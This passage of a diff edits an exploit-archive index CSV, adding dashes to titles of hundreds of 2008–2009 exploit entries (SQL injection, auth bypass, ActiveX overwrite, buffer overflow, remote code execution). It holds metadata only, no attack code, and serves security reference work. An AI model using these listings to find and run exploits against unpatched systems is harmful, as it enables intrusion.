(SaveLastError) Insecure Method Exploit",2008-12-28,callAX,windows,remote,0 -7595,platforms/php/webapps/7595.txt,"FubarForum 1.6 Arbitrary Admin Bypass Vulnerability",2008-12-28,k3yv4n,php,webapps,0 +7595,platforms/php/webapps/7595.txt,"FubarForum 1.6 - Arbitrary Admin Bypass Vulnerability",2008-12-28,k3yv4n,php,webapps,0 7596,platforms/php/webapps/7596.txt,"AlstraSoft Web Email Script Enterprise (id) SQL Injection Vuln",2008-12-28,Bgh7,php,webapps,0 7597,platforms/php/webapps/7597.txt,"OwenPoll 1.0 Insecure Cookie Handling Vulnerability",2008-12-28,Osirys,php,webapps,0 7598,platforms/php/webapps/7598.txt,"PHP-Fusion Mod TI (id) Remote SQL Injection Vulnerability",2008-12-28,IRCRASH,php,webapps,0 @@ -7154,10 +7154,10 @@ id,file,description,date,author,platform,type,port 7614,platforms/php/webapps/7614.txt,"FlexPHPDirectory 0.0.1 (Auth Bypass) SQL Injection Vulnerability",2008-12-29,x0r,php,webapps,0 7615,platforms/php/webapps/7615.txt,"Flexphpsite 0.0.1 (Auth Bypass) SQL Injection Vulnerability",2008-12-29,x0r,php,webapps,0 7616,platforms/php/webapps/7616.txt,"Flexphplink 0.0.x - (Auth Bypass) SQL Injection Vulnerability",2008-12-29,x0r,php,webapps,0 -7617,platforms/windows/remote/7617.html,"SasCam WebCam Server 2.6.5 ActiveX Remote BoF Exploit",2008-12-29,callAX,windows,remote,0 +7617,platforms/windows/remote/7617.html,"SasCam WebCam Server 2.6.5 - ActiveX Remote BoF Exploit",2008-12-29,callAX,windows,remote,0 7618,platforms/linux/local/7618.c,"Linux Kernel < 2.6.26.4 - SCTP Kernel Memory Disclosure Exploit",2008-12-29,"Jon Oberheide",linux,local,0 7619,platforms/php/webapps/7619.txt,"eDNews 2.0 - (eDNews_view.php newsid) SQL Injection Vulnerability",2008-12-29,"Virangar Security",php,webapps,0 -7620,platforms/php/webapps/7620.txt,"ThePortal 2.2 Arbitrary Remote File Upload Exploit",2008-12-29,siurek22,php,webapps,0 +7620,platforms/php/webapps/7620.txt,"ThePortal 2.2 - Arbitrary Remote File Upload Exploit",2008-12-29,siurek22,php,webapps,0 7621,platforms/php/webapps/7621.txt,"PHPAlumni (Acomment.php id) SQL Injection Vulnerability",2008-12-29,Mr.SQL,php,webapps,0 7622,platforms/php/webapps/7622.txt,"Flexcustomer 0.0.6 Admin Login Bypass / Possible PHP code writing",2008-12-29,Osirys,php,webapps,0 7623,platforms/windows/remote/7623.html,"Megacubo 5.0.7 (mega://) Remote eval() Injection Exploit",2008-12-30,Nine:Situations:Group,windows,remote,0 @@ -7276,7 +7276,7 @@ id,file,description,date,author,platform,type,port 7736,platforms/asp/webapps/7736.htm,"Comersus Shopping Cart <= 6.0 - Remote User Pass Exploit",2009-01-12,ajann,asp,webapps,0 7737,platforms/windows/dos/7737.py,"Triologic Media Player 7 - (.m3u) Local Heap Buffer Overflow PoC",2009-01-12,zAx,windows,dos,0 7738,platforms/php/webapps/7738.txt,"Wordpress plugin WP-Forum 1.7.8 - Remote SQL Injection Vulnerability",2009-01-12,seomafia,php,webapps,0 -7739,platforms/windows/remote/7739.html,"ExcelOCX ActiveX 3.2 (Download File) Insecure Method Exploit",2009-01-12,"Alfons Luja",windows,remote,0 +7739,platforms/windows/remote/7739.html,"ExcelOCX ActiveX 3.2 - (Download File) Insecure Method Exploit",2009-01-12,"Alfons Luja",windows,remote,0 7740,platforms/php/webapps/7740.txt,"PWP Wiki Processor 1-5-1 - Remote File Upload Vulnerability",2009-01-12,ahmadbady,php,webapps,0 7741,platforms/asp/webapps/7741.txt,"dMx READY (25 Products) Remote Database Disclosure Vulnerability",2009-01-12,Cyber-Zone,asp,webapps,0 7742,platforms/windows/dos/7742.txt,"Winamp <= 5.541 (mp3/aiff) Multiple Denial of Service Exploits",2009-01-12,securfrog,windows,dos,0 @@ -7284,12 +7284,12 @@ id,file,description,date,author,platform,type,port 7744,platforms/asp/webapps/7744.txt,"Virtual GuestBook 2.1 - Remote Database Disclosure Vulnerability",2009-01-13,Moudi,asp,webapps,0 7745,platforms/windows/local/7745.py,"VUPlayer 2.49 - (.asx) (Universal) Local Buffer Overflow Exploit",2009-01-13,"Encrypt3d.M!nd ",windows,local,0 7746,platforms/php/webapps/7746.txt,"Joomla Component com_gigcal (gigcal_gigs_id) 1.0 - SQL Injection",2009-01-13,boom3rang,php,webapps,0 -7747,platforms/windows/remote/7747.html,"Word Viewer OCX 3.2 ActiveX (Save) Remote File Overwrite Exploit",2009-01-13,Houssamix,windows,remote,0 +7747,platforms/windows/remote/7747.html,"Word Viewer OCX 3.2 - ActiveX (Save) Remote File Overwrite Exploit",2009-01-13,Houssamix,windows,remote,0 7748,platforms/windows/remote/7748.html,"Office Viewer ActiveX Control 3.0.1 (Save) Remote File Overwrite Exploit",2009-01-13,Houssamix,windows,remote,0 7749,platforms/windows/remote/7749.html,"Office Viewer ActiveX Control 3.0.1 - Remote File Execution Exploit",2009-01-13,Houssamix,windows,remote,0 7750,platforms/windows/dos/7750.html,"PowerPoint Viewer OCX 3.1 - Remote File Overwrite Exploit",2009-01-13,Stack,windows,dos,0 7751,platforms/windows/dos/7751.pl,"dBpowerAMP Audio Player 2 - (.pls) Local Buffer Overflow PoC",2009-01-13,Stack,windows,dos,0 -7752,platforms/asp/webapps/7752.txt,"DMXReady News Manager <= 1.1 Arbitrary Category Change Vuln",2009-01-13,ajann,asp,webapps,0 +7752,platforms/asp/webapps/7752.txt,"DMXReady News Manager <= 1.1 - Arbitrary Category Change Vuln",2009-01-13,ajann,asp,webapps,0 7753,platforms/cgi/webapps/7753.pl,"HSPell 1.1 (cilla.cgi) Remote Command Execution Exploit",2009-01-13,ZeN,cgi,webapps,0 7754,platforms/asp/webapps/7754.txt,"DMXReady Account List Manager <= 1.1 Contents Change Vulnerability",2009-01-13,ajann,asp,webapps,0 7755,platforms/windows/remote/7755.html,"PowerPoint Viewer OCX 3.1 - Remote File Execution Exploit",2009-01-13,Cyber-Zone,windows,remote,0 @@ -7331,7 +7331,7 @@ id,file,description,date,author,platform,type,port 7791,platforms/asp/webapps/7791.txt,"DMXReady Billboard Manager <= 1.1 - Remote File Upload Vulnerability",2009-01-15,ajann,asp,webapps,0 7792,platforms/php/webapps/7792.txt,"GNUBoard 4.31.03 (08.12.29) Local File Inclusion Vulnerability",2009-01-15,flyh4t,php,webapps,0 7793,platforms/php/webapps/7793.php,"Joomla com_Eventing 1.6.x - BlindSQL Injection Exploit",2009-01-15,InjEctOr5,php,webapps,0 -7794,platforms/windows/remote/7794.html,"Ciansoft PDFBuilderX 2.2 ActiveX Arbitrary File Overwrite Exploit",2009-01-15,"Alfons Luja",windows,remote,0 +7794,platforms/windows/remote/7794.html,"Ciansoft PDFBuilderX 2.2 - ActiveX Arbitrary File Overwrite Exploit",2009-01-15,"Alfons Luja",windows,remote,0 7795,platforms/php/webapps/7795.txt,"Joomla Component RD-Autos 1.5.5 (id) SQL Injection Vulnerability",2009-01-15,H!tm@N,php,webapps,0 7796,platforms/php/webapps/7796.txt,"mkportal <= 1.2.1 () Multiple Vulnerabilities",2009-01-15,waraxe,php,webapps,0 7797,platforms/php/webapps/7797.php,"Blue Eye CMS <= 1.0.0 (clanek) Blind SQL Injection Exploit",2009-01-15,darkjoker,php,webapps,0 @@ -7370,7 +7370,7 @@ id,file,description,date,author,platform,type,port 7832,platforms/php/webapps/7832.txt,"phpads 2.0 - Multiple Vulnerabilities",2009-01-19,"Danny Moules",php,webapps,0 7833,platforms/php/webapps/7833.php,"Joomla com_waticketsystem Blind SQL Injection Exploit",2009-01-19,InjEctOr5,php,webapps,0 7834,platforms/php/webapps/7834.txt,"Ninja Blog 4.8 (CSRF/HTML Injection) Vulnerability",2009-01-19,"Danny Moules",php,webapps,0 -7835,platforms/php/webapps/7835.htm,"Max.Blog 1.0.6 Arbitrary Delete Post Exploit",2009-01-20,SirGod,php,webapps,0 +7835,platforms/php/webapps/7835.htm,"Max.Blog 1.0.6 - Arbitrary Delete Post Exploit",2009-01-20,SirGod,php,webapps,0 7836,platforms/php/webapps/7836.txt,"AJ Auction Pro OOPD 2.3 - (id) SQL Injection Vulnerability",2009-01-20,snakespc,php,webapps,0 7837,platforms/php/webapps/7837.pl,"LinPHA Photo Gallery 2.0 - Remote Command Execution Exploit",2009-01-20,Osirys,php,webapps,0 7838,platforms/php/webapps/7838.txt,"Dodo's Quiz Script 1.1 (dodosquiz.php) Local File Inclusion Vulnerability",2009-01-20,Stack,php,webapps,0 @@ -7573,8 +7573,8 @@ id,file,description,date,author,platform,type,port 8044,platforms/php/webapps/8044.txt,"Den Dating 9.01 - (searchmatch.php) SQL Injection Vulnerability",2009-02-11,nuclear,php,webapps,0 8045,platforms/php/webapps/8045.pl,"InselPhoto 1.1 (query) Remote SQL Injection Exploit",2009-02-11,Osirys,php,webapps,0 8046,platforms/php/webapps/8046.txt,"PHP Krazy Image Host Script 1.01 (viewer.php id) SQL Injection Vuln",2009-02-12,x0r,php,webapps,0 -8047,platforms/php/webapps/8047.txt,"Free Joke Script 1.0 Auth Bypass / SQL Injection Vulnerability",2009-02-12,Muhacir,php,webapps,0 -8048,platforms/asp/webapps/8048.txt,"Baran CMS 1.0 Arbitrary ASP File Upload/DB/SQL/XSS/CM Vulns",2009-02-12,"Aria-Security Team",asp,webapps,0 +8047,platforms/php/webapps/8047.txt,"Free Joke Script 1.0 - Auth Bypass / SQL Injection Vulnerability",2009-02-12,Muhacir,php,webapps,0 +8048,platforms/asp/webapps/8048.txt,"Baran CMS 1.0 - Arbitrary ASP File Upload/DB/SQL/XSS/CM Vulns",2009-02-12,"Aria-Security Team",asp,webapps,0 8049,platforms/php/webapps/8049.txt,"ideacart 0.02 - (LFI/SQL) Multiple Vulnerabilities",2009-02-13,nuclear,php,webapps,0 8050,platforms/php/webapps/8050.txt,"Vlinks 1.1.6 (id) Remote SQL Injection Vulnerability",2009-02-13,JIKO,php,webapps,0 8051,platforms/hardware/dos/8051.html,"Nokia N95-8 browser (setAttributeNode) Method Crash Exploit",2009-02-13,"Juan Yacubian",hardware,dos,0 @@ -7594,14 +7594,14 @@ id,file,description,date,author,platform,type,port 8066,platforms/php/webapps/8066.txt,"YACS CMS 8.11 update_trailer.php Remote File Inclusion Vulnerability",2009-02-16,ahmadbady,php,webapps,0 8067,platforms/multiple/local/8067.txt,"Enomaly ECP / Enomalism < 2.2.1 - Multiple Local Vulnerabilities",2009-02-16,"Sam Johnston",multiple,local,0 8068,platforms/php/webapps/8068.txt,"ravennuke 2.3.0 - Multiple Vulnerabilities",2009-02-16,waraxe,php,webapps,0 -8069,platforms/php/webapps/8069.txt,"Grestul 1.x Auth Bypass by Cookie SQL Injection Vulnerability",2009-02-16,x0r,php,webapps,0 +8069,platforms/php/webapps/8069.txt,"Grestul 1.x - Auth Bypass by Cookie SQL Injection Vulnerability",2009-02-16,x0r,php,webapps,0 8070,platforms/asp/webapps/8070.txt,"SAS Hotel Management System Remote Shell Upload Vulnerability",2009-02-17,ZoRLu,asp,webapps,0 8071,platforms/php/webapps/8071.txt,"S-CMS 1.1 Stable Insecure Cookie Handling / Mass Page Delete Vulns",2009-02-17,x0r,php,webapps,0 8072,platforms/php/webapps/8072.txt,"pHNews Alpha 1 (header.php mod) SQL Injection Vulnerability",2009-02-17,x0r,php,webapps,0 8073,platforms/php/webapps/8073.txt,"pHNews Alpha 1 (genbackup.php) Database Disclosure Vulnerability",2009-02-17,x0r,php,webapps,0 8074,platforms/multiple/local/8074.rb,"Oracle 10g MDSYS.SDO_TOPO_DROP_FTBL SQL Injection Exploit (meta)",2009-02-18,sh2kerr,multiple,local,0 8075,platforms/php/webapps/8075.pl,"Firepack (admin/ref.php) Remote Code Execution Exploit",2009-02-18,Lidloses_Auge,php,webapps,0 -8076,platforms/php/webapps/8076.txt,"smNews 1.0 Auth Bypass/Column Truncation Vulnerabilities",2009-02-18,x0r,php,webapps,0 +8076,platforms/php/webapps/8076.txt,"smNews 1.0 - Auth Bypass/Column Truncation Vulnerabilities",2009-02-18,x0r,php,webapps,0 8077,platforms/windows/dos/8077.html,"Microsoft Internet Explorer 7 - Memory Corruption PoC (MS09-002)",2009-02-18,N/A,windows,dos,0 8079,platforms/windows/remote/8079.html,"Microsoft Internet Explorer 7 - Memory Corruption Exploit (MS09-002) (XP SP2)",2009-02-20,Abysssec,windows,remote,0 8080,platforms/windows/remote/8080.py,"Microsoft Internet Explorer 7 - Memory Corruption Exploit (MS09-002) (py)",2009-02-20,"David Kennedy (ReL1K)",windows,remote,0 @@ -7650,7 +7650,7 @@ id,file,description,date,author,platform,type,port 8127,platforms/php/webapps/8127.txt,"blogman 0.45 - Multiple Vulnerabilities",2009-03-02,"Salvatore Fresta",php,webapps,0 8128,platforms/php/webapps/8128.txt,"EZ-Blog 1b Delete All Posts / SQL Injection Vulnerabilities",2009-03-02,"Salvatore Fresta",php,webapps,0 8129,platforms/windows/dos/8129.pl,"Novell eDirectory iMonitor (Accept-Language) Request BoF PoC",2009-03-02,"Praveen Darshanam",windows,dos,0 -8130,platforms/asp/webapps/8130.txt,"Document Library 1.0.1 Arbitrary Change Admin Vulnerability",2009-03-02,ByALBAYX,asp,webapps,0 +8130,platforms/asp/webapps/8130.txt,"Document Library 1.0.1 - Arbitrary Change Admin Vulnerability",2009-03-02,ByALBAYX,asp,webapps,0 8131,platforms/asp/webapps/8131.txt,"Digital Interchange Calendar 5.7.13 Contents Change Vulnerability",2009-03-02,ByALBAYX,asp,webapps,0 8132,platforms/asp/webapps/8132.txt,"Access2asp imageLibrary Arbitrary ASP Shell Upload Vulnerability",2009-03-02,mr.al7rbi,asp,webapps,0 8133,platforms/php/webapps/8133.txt,"Graugon PHP Article Publisher 1.0 (SQL/CH) Multiple Remote Vulns",2009-03-02,x0r,php,webapps,0 @@ -7766,7 +7766,7 @@ id,file,description,date,author,platform,type,port 8254,platforms/php/webapps/8254.pl,"WBB3 rGallery 1.2.3 (UserGallery) Blind SQL Injection Exploit",2009-03-23,Invisibility,php,webapps,0 8255,platforms/php/webapps/8255.txt,"SuperNews 1.5 (valor.php noticia) SQL Injection Vulnerability",2009-03-23,p3s0k!,php,webapps,0 8256,platforms/windows/remote/8256.c,"Sysax Multi Server 4.3 - Remote Arbitrary Delete Files Exploit",2009-03-23,"Jonathan Salwan",windows,remote,0 -8257,platforms/windows/remote/8257.txt,"Orbit Downloader 2.8.7 Arbitrary File Deletion Vulnerability",2009-03-23,waraxe,windows,remote,0 +8257,platforms/windows/remote/8257.txt,"Orbit Downloader 2.8.7 - Arbitrary File Deletion Vulnerability",2009-03-23,waraxe,windows,remote,0 8258,platforms/php/webapps/8258.pl,"X-BLC 0.2.0 (get_read.php section) SQL Injection Vulnerability",2009-03-23,dun,php,webapps,0 8259,platforms/freebsd/dos/8259.c,"FreeBSD 7.x (Dumping Environment) Local Kernel Panic Exploit",2009-03-23,kokanin,freebsd,dos,0 8260,platforms/hardware/dos/8260.txt,"Gigaset SE461 WiMAX router Remote Denial of Service Vulns",2009-03-23,Benkei,hardware,dos,0 @@ -7786,7 +7786,7 @@ id,file,description,date,author,platform,type,port 8274,platforms/windows/local/8274.pl,"POP Peeper 3.4.0.0 - (.eml) Universal SEH Overwrite Exploit",2009-03-23,Stack,windows,local,0 8275,platforms/windows/local/8275.pl,"POP Peeper 3.4.0.0 - (.htm)l Universal SEH Overwrite Exploit",2009-03-23,Stack,windows,local,0 8276,platforms/php/webapps/8276.pl,"Syzygy CMS 0.3 - LFI/SQL Command Injection Exploit",2009-03-23,Osirys,php,webapps,0 -8277,platforms/php/webapps/8277.txt,"Free Arcade Script 1.0 Auth Bypass (SQL) / Upload Shell Vulnerabilities",2009-03-23,Mr.Skonnie,php,webapps,0 +8277,platforms/php/webapps/8277.txt,"Free Arcade Script 1.0 - Auth Bypass (SQL) / Upload Shell Vulnerabilities",2009-03-23,Mr.Skonnie,php,webapps,0 8278,platforms/php/webapps/8278.txt,"Jinzora Media Jukebox <= 2.8 (name) Local File Inclusion Vulnerability",2009-03-24,dun,php,webapps,0 8279,platforms/php/webapps/8279.txt,"PHPizabi 0.848b - C1 HFP1 - Remote Privilege Escalation Vulnerability",2009-03-24,Nine:Situations:Group,php,webapps,0 8280,platforms/windows/local/8280.txt,"Adobe Acrobat Reader - JBIG2 Universal Exploit (Bind Shell Port 5500)",2009-03-24,"Black Security",windows,local,0 @@ -7840,7 +7840,7 @@ id,file,description,date,author,platform,type,port 8329,platforms/php/webapps/8329.txt,"JobHut 1.2 - Remote Password Change/Delete/Activate User Vulnerability",2009-03-31,"ThE g0bL!N",php,webapps,0 8330,platforms/php/webapps/8330.txt,"PHPRecipeBook 2.39 (course_id) Remote SQL Injection Vulnerability",2009-03-31,DarKdewiL,php,webapps,0 8331,platforms/php/webapps/8331.txt,"vsp stats processor 0.45 (gamestat.php gameID) SQL Injection Vuln",2009-03-31,Dimi4,php,webapps,0 -8332,platforms/windows/remote/8332.txt,"PrecisionID Datamatrix ActiveX Arbitrary File Overwrite Vuln",2009-03-31,DSecRG,windows,remote,0 +8332,platforms/windows/remote/8332.txt,"PrecisionID Datamatrix - ActiveX Arbitrary File Overwrite Vuln",2009-03-31,DSecRG,windows,remote,0 8333,platforms/multiple/dos/8333.txt,"Sun Calendar Express Web Server - (DoS/XSS) Multiple Remote Vulns",2009-03-31,"Core Security",multiple,dos,0 8334,platforms/php/webapps/8334.txt,"Koschtit Image Gallery 1.82 - Multiple Local File Inclusion Vulnerabilities",2009-04-01,ahmadbady,php,webapps,0 8335,platforms/windows/dos/8335.c,"DeepBurner 1.9.0.228 - Stack Buffer Overflow (SEH) PoC",2009-04-01,"fl0 fl0w",windows,dos,0 @@ -7924,7 +7924,7 @@ id,file,description,date,author,platform,type,port 8416,platforms/windows/local/8416.pl,"Mini-stream Ripper 3.0.1.1 - (.m3u) Universal Stack Overflow Exploit",2009-04-13,Stack,windows,local,0 8417,platforms/php/webapps/8417.txt,"e107 Plugin userjournals_menu (blog.id) SQL Injection Vulnerability",2009-04-13,boom3rang,php,webapps,0 8418,platforms/php/webapps/8418.pl,"ASP Product Catalog 1.0 (XSS/DD) Multiple Remote Exploits",2009-04-13,AlpHaNiX,php,webapps,0 -8419,platforms/windows/remote/8419.pl,"ftpdmin 0.96 Arbitrary File Disclosure Exploit",2009-04-13,Stack,windows,remote,21 +8419,platforms/windows/remote/8419.pl,"ftpdmin 0.96 - Arbitrary File Disclosure Exploit",2009-04-13,Stack,windows,remote,21 8420,platforms/windows/local/8420.py,"BulletProof FTP Client 2009 - (.bps) Buffer Overflow Exploit (SEH)",2009-04-13,His0k4,windows,local,0 8421,platforms/windows/remote/8421.py,"Steamcast (HTTP Request) Remote Buffer Overflow Exploit (SEH) (1)",2009-04-13,His0k4,windows,remote,8000 8422,platforms/windows/remote/8422.py,"Steamcast - (HTTP Request) Remote Buffer Overflow Exploit (SEH) (2)",2009-04-13,His0k4,windows,remote,8000 @@ -8003,7 +8003,7 @@ id,file,description,date,author,platform,type,port 8495,platforms/php/webapps/8495.pl,"e107 <= 0.7.15 - (extended_user_fields) Blind SQL Injection Exploit",2009-04-20,StAkeR,php,webapps,0 8496,platforms/php/webapps/8496.htm,"TotalCalendar 2.4 - Remote Password Change Exploit",2009-04-20,"ThE g0bL!N",php,webapps,0 8497,platforms/php/webapps/8497.txt,"Creasito e-Commerce 1.3.16 (Auth Bypass) SQL Injection Vuln",2009-04-20,"Salvatore Fresta",php,webapps,0 -8498,platforms/php/webapps/8498.txt,"eLitius 1.0 Arbitrary Database Backup Exploit",2009-04-20,"ThE g0bL!N",php,webapps,0 +8498,platforms/php/webapps/8498.txt,"eLitius 1.0 - Arbitrary Database Backup Exploit",2009-04-20,"ThE g0bL!N",php,webapps,0 8499,platforms/php/webapps/8499.php,"Dokeos Lms <= 1.8.5 (whoisonline.php) PHP Code Injection Exploit",2009-04-21,EgiX,php,webapps,0 8500,platforms/windows/dos/8500.py,"Zervit Webserver 0.3 - Remote Denial of Service Exploit",2009-04-21,shinnai,windows,dos,0 8501,platforms/php/webapps/8501.txt,"CRE Loaded 6.2 (products_id) SQL Injection Vulnerability",2009-04-21,Player,php,webapps,0 @@ -8014,7 +8014,7 @@ id,file,description,date,author,platform,type,port 8506,platforms/php/webapps/8506.txt,"VS PANEL 7.3.6 (Cat_ID) Remote SQL Injection Vulnerability",2009-04-21,Player,php,webapps,0 8507,platforms/windows/dos/8507.py,"Oracle RDBms 10.2.0.3/11.1.0.6 - TNS Listener PoC",2009-04-21,"Dennis Yurichev",windows,dos,0 8508,platforms/php/webapps/8508.txt,"I-Rater Pro/Plantinum 4.0 - (Auth Bypass) SQL Injection Vulnerability",2009-04-21,Hakxer,php,webapps,0 -8509,platforms/php/webapps/8509.txt,"Studio Lounge Address Book 2.5 Authentication Bypass Vulnerability",2009-04-21,"ThE g0bL!N",php,webapps,0 +8509,platforms/php/webapps/8509.txt,"Studio Lounge Address Book 2.5 - Authentication Bypass Vulnerability",2009-04-21,"ThE g0bL!N",php,webapps,0 8510,platforms/php/webapps/8510.txt,"mixedcms 1.0b (LFI/su/ab/fd) Multiple Vulnerabilities",2009-04-21,YEnH4ckEr,php,webapps,0 8511,platforms/windows/dos/8511.pl,"Xitami Web Server <= 5.0 - Remote Denial of Service Exploit",2009-04-22,"Jonathan Salwan",windows,dos,0 8512,platforms/windows/dos/8512.txt,"Counter Strike Source ManiAdminPlugin 2.0 - Remote Crash Exploit",2009-04-22,M4rt1n,windows,dos,0 @@ -8023,7 +8023,7 @@ id,file,description,date,author,platform,type,port 8515,platforms/php/webapps/8515.txt,"5 star Rating 1.2 (Auth Bypass) SQL Injection Vulnerability",2009-04-22,zer0day,php,webapps,0 8516,platforms/php/webapps/8516.txt,"WebPortal CMS 0.8b - Multiple Remote/Local File Inclusion Vulnerabilities",2009-04-22,ahmadbady,php,webapps,0 8517,platforms/php/webapps/8517.txt,"Joomla Component rsmonials Remote Cross-Site Scripting Exploit",2009-04-22,jdc,php,webapps,0 -8518,platforms/windows/remote/8518.pl,"Femitter FTP Server 1.03 Arbitrary File Disclosure Exploit",2009-04-22,Stack,windows,remote,0 +8518,platforms/windows/remote/8518.pl,"Femitter FTP Server 1.03 - Arbitrary File Disclosure Exploit",2009-04-22,Stack,windows,remote,0 8519,platforms/windows/local/8519.pl,"CoolPlayer Portable 2.19.1 - (m3u) Buffer Overflow Exploit",2009-04-22,Stack,windows,local,0 8520,platforms/windows/local/8520.py,"CoolPlayer Portable 2.19.1 - (m3u) Buffer Overflow Exploit (2)",2009-04-22,His0k4,windows,local,0 8521,platforms/php/webapps/8521.txt,"fowlcms 1.1 (ab/lfi/su) Multiple Vulnerabilities",2009-04-23,YEnH4ckEr,php,webapps,0 @@ -8066,13 +8066,13 @@ id,file,description,date,author,platform,type,port 8558,platforms/php/webapps/8558.txt,"MIM: InfiniX 1.2.003 - Multiple SQL Injection Vulnerabilities",2009-04-28,YEnH4ckEr,php,webapps,0 8559,platforms/php/webapps/8559.c,"webSPELL <= 4.2.0d - Local File Disclosure Exploit (.c Linux)",2009-04-28,StAkeR,php,webapps,0 8560,platforms/windows/remote/8560.html,"Autodesk IDrop ActiveX Remote Code Execution Exploit",2009-04-28,Elazar,windows,remote,0 -8561,platforms/windows/remote/8561.pl,"Quick 'n Easy Web Server 3.3.5 Arbitrary File Disclosure Exploit",2009-04-28,Cyber-Zone,windows,remote,0 +8561,platforms/windows/remote/8561.pl,"Quick 'n Easy Web Server 3.3.5 - Arbitrary File Disclosure Exploit",2009-04-28,Cyber-Zone,windows,remote,0 8562,platforms/windows/remote/8562.html,"Symantec Fax Viewer Control 10 (DCCFAXVW.DLL) Remote BoF Exploit",2009-04-29,Nine:Situations:Group,windows,remote,0 8563,platforms/php/webapps/8563.txt,"eLitius 1.0 (banner-details.php id) SQL Injection Vulnerability",2009-04-29,snakespc,php,webapps,0 -8564,platforms/windows/remote/8564.pl,"Baby Web Server 2.7.2.0 Arbitrary File Disclosure Exploit",2009-04-29,ZoRLu,windows,remote,0 +8564,platforms/windows/remote/8564.pl,"Baby Web Server 2.7.2.0 - Arbitrary File Disclosure Exploit",2009-04-29,ZoRLu,windows,remote,0 8565,platforms/php/webapps/8565.txt,"ProjectCMS 1.0b (index.php sn) Remote SQL Injection Vulnerability",2009-04-29,YEnH4ckEr,php,webapps,0 8566,platforms/php/webapps/8566.txt,"S-CMS 1.1 Stable (page) Local File Inclusion Vulnerability",2009-04-29,ZoRLu,php,webapps,0 -8567,platforms/php/webapps/8567.txt,"Zubrag Smart File Download 1.3 Arbitrary File Download Vulnerability",2009-04-29,Aodrulez,php,webapps,0 +8567,platforms/php/webapps/8567.txt,"Zubrag Smart File Download 1.3 - Arbitrary File Download Vulnerability",2009-04-29,Aodrulez,php,webapps,0 8568,platforms/windows/dos/8568.pl,"mpegable Player 2.12 (YUV File) Local Stack Overflow PoC",2009-04-29,GoLd_M,windows,dos,0 8569,platforms/linux/remote/8569.txt,"Adobe Reader 8.1.4/9.1 GetAnnots() Remote Code Execution Exploit",2009-04-29,Arr1val,linux,remote,0 8570,platforms/linux/remote/8570.txt,"Adobe 8.1.4/9.1 customDictionaryOpen() Code Execution Exploit",2009-04-29,Arr1val,linux,remote,0 @@ -8108,7 +8108,7 @@ id,file,description,date,author,platform,type,port 8602,platforms/php/webapps/8602.txt,"Qt quickteam Multiple Remote File Inclusion Vulnerabilities",2009-05-04,ahmadbady,php,webapps,0 8603,platforms/php/webapps/8603.php,"eLitius 1.0 - Remote Command Execution Exploit",2009-05-04,G4N0K,php,webapps,0 8604,platforms/php/webapps/8604.txt,"PHP Site Lock 2.0 Insecure Cookie Handling Vulnerability",2009-05-04,"ThE g0bL!N",php,webapps,0 -8605,platforms/php/webapps/8605.txt,"Million Dollar Text Links 1.0 Arbitrary Auth Bypass Vulnerability",2009-05-04,"ThE g0bL!N",php,webapps,0 +8605,platforms/php/webapps/8605.txt,"Million Dollar Text Links 1.0 - Arbitrary Auth Bypass Vulnerability",2009-05-04,"ThE g0bL!N",php,webapps,0 8606,platforms/windows/dos/8606.py,"Quick 'n Easy Mail Server 3.3 (Demo) Remote Denial of Service PoC",2009-05-04,shinnai,windows,dos,0 8607,platforms/windows/dos/8607.pl,"Bmxplay 0.4.4b - (.BMX ) Local Buffer Overflow PoC",2009-05-04,SirGod,windows,dos,0 8608,platforms/php/webapps/8608.txt,"projectcms 1.1b - Multiple Vulnerabilities",2009-05-04,YEnH4ckEr,php,webapps,0 @@ -8129,7 +8129,7 @@ id,file,description,date,author,platform,type,port 8623,platforms/windows/remote/8623.rb,"32bit FTP - (PASV) Reply Client Remote Overflow Exploit (meta)",2009-05-07,His0k4,windows,remote,0 8624,platforms/windows/local/8624.pl,"Soritong MP3 Player 1.0 - Local Buffer Overflow Exploit (SEH)",2009-05-07,Stack,windows,local,0 8625,platforms/windows/dos/8625.pl,"Sorinara Streaming Audio Player 0.9 - (.PLA) Local Stack Overflow PoC",2009-05-07,GoLd_M,windows,dos,0 -8626,platforms/php/webapps/8626.txt,"TCPDB 3.8 Arbitrary Add Admin Account Vulnerability",2009-05-07,Mr.tro0oqy,php,webapps,0 +8626,platforms/php/webapps/8626.txt,"TCPDB 3.8 - Arbitrary Add Admin Account Vulnerability",2009-05-07,Mr.tro0oqy,php,webapps,0 8627,platforms/asp/webapps/8627.txt,"T-Dreams Job Career Package 3.0 Insecure Cookie Handling Vulnerability",2009-05-07,TiGeR-Dz,asp,webapps,0 8628,platforms/windows/local/8628.pl,"RM Downloader 3.0.0.9 - (.RAM) Local Buffer Overflow Exploit",2009-05-07,G4N0K,windows,local,0 8629,platforms/windows/local/8629.pl,"Mini-stream ASX to MP3 Converter 3.0.0.7 - (.RAM) Buffer Overflow Exploit",2009-05-07,G4N0K,windows,local,0 @@ -8141,8 +8141,8 @@ id,file,description,date,author,platform,type,port 8635,platforms/php/webapps/8635.txt,"VIDEOSCRIPT.us (Auth Bypass) SQL Injection Vulnerability",2009-05-07,snakespc,php,webapps,0 8636,platforms/php/webapps/8636.txt,"ST-Gallery 0.1a - Multiple SQL Injection Vulnerabilities",2009-05-07,YEnH4ckEr,php,webapps,0 8637,platforms/windows/local/8637.pl,"GrabIt 1.7.2x NZB DTD Reference Buffer Overflow Exploit",2009-05-07,"Jeremy Brown",windows,local,0 -8638,platforms/php/webapps/8638.htm,"Simple Customer 1.3 Arbitrary Change Admin Password Exploit",2009-05-07,ahmadbady,php,webapps,0 -8639,platforms/php/webapps/8639.htm,"Job Script 2.0 Arbitrary Change Admin Password Exploit",2009-05-07,TiGeR-Dz,php,webapps,0 +8638,platforms/php/webapps/8638.htm,"Simple Customer 1.3 - Arbitrary Change Admin Password Exploit",2009-05-07,ahmadbady,php,webapps,0 +8639,platforms/php/webapps/8639.htm,"Job Script 2.0 - Arbitrary Change Admin Password Exploit",2009-05-07,TiGeR-Dz,php,webapps,0 8640,platforms/windows/local/8640.pl,"Sorinara Streaming Audio Player 0.9 - (.PLA) Stack Overflow Exploit",2009-05-07,Hakxer,windows,local,0 8641,platforms/multiple/local/8641.txt,"PHP mb_ereg(i)_replace() Evaluate Replacement String Vulnerability",2009-05-07,80vul,multiple,local,0 8642,platforms/php/webapps/8642.txt,"The Recipe Script 5 (Auth Bypass) SQL Injection / DB Backup Vulns",2009-05-08,TiGeR-Dz,php,webapps,0 @@ -8154,13 +8154,13 @@ id,file,description,date,author,platform,type,port 8648,platforms/php/webapps/8648.pl,"RTWebalbum 1.0.462 (AlbumID) Blind SQL Injection Exploit",2009-05-08,YEnH4ckEr,php,webapps,0 8649,platforms/php/webapps/8649.php,"TinyWebGallery <= 1.7.6 - 